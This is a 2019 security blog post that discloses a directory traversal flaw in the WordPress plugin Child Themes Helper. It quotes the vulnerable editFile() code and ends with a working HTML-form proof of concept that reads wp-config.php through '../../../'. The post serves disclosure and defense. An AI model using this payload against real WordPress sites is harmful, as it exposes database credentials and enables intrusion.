27 Mar 2019

Full Disclosure of Authenticated Arbitrary File Viewing Vulnerability in Child Themes Helper

In our previous post we detailed an authenticated arbitrary file upload that our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities caught in the plugin Child Themes Helper. It looks like there is quite a bit of inadequately secured code in the plugin, but one other issue that stood out is an authenticated arbitrary file viewing vulnerability.

The plugin makes the function editFile() available to those logged in to WordPress:

383
add_action( 'wp_ajax_editFile', Array( $pas_cth_AJAXFunctions, "editFile" ) );

That function will display the contents of an arbitrary file:

977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
function editFile() {
 
	$inputs =
 
		[
 
			'directory'	=> sanitize_text_field( $_POST['directory'] ),
 
			'file'	=> sanitize_file_name( $_POST['file'] ),
 
			'themeType' => sanitize_text_field( $_POST['themeType'] ),
 
		];
 
	switch (strtolower($inputs['themeType'])) {
 
		case PAS_CTH_CHILDTHEME:
 
			$file = $this->activeThemeInfo->childThemeRoot . PAS_CTH_SEPARATOR . $this->activeThemeInfo->childStylesheet . PAS_CTH_SEPARATOR . $inputs['directory'] . PAS_CTH_SEPARATOR . $inputs['file'];
 
			$readOnly = 'false';
 
			break;
 
		case PAS_CTH_TEMPLATETHEME:
 
			$file = $this->activeThemeInfo->templateThemeRoot . PAS_CTH_SEPARATOR . $this->activeThemeInfo->templateStylesheet . PAS_CTH_SEPARATOR . $inputs['directory'] . PAS_CTH_SEPARATOR . $inputs['file'];
 
			$readOnly = 'true';
 
			break;
 
	}
 
	$inputs['readOnlyFlag'] = $readOnly;
 
 
 
	$fileContents = stripslashes(str_replace(">", ">", str_replace("<", "<", file_get_contents($file))));
 
	echo "EDITFILEOUTPUT:{";
 
	echo "ARGS<:>" . json_encode($inputs);
 
	echo '+|++|+';
 
	echo "EDITBOX<:>{$fileContents}";

What is missing from that code is a restriction on what users can access that code and probably protection against directory traversal.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriate is more important that what is best for the rest of the community.

Proof of Concept

The following proof of concept will display the contents of the WordPress configuration file, when logged in to WordPress and when a child theme has been selected in the plugin’s options.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=editFile" method="POST">
<input type="hidden" name="themeType" value="child" />
<input type="hidden" name="directory" value="../../../" />
<input type="hidden" name="file" value="wp-config.php" />
<input type="hidden" name="fileContents" value="[file contents]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

Leave a Reply

Your email address will not be published.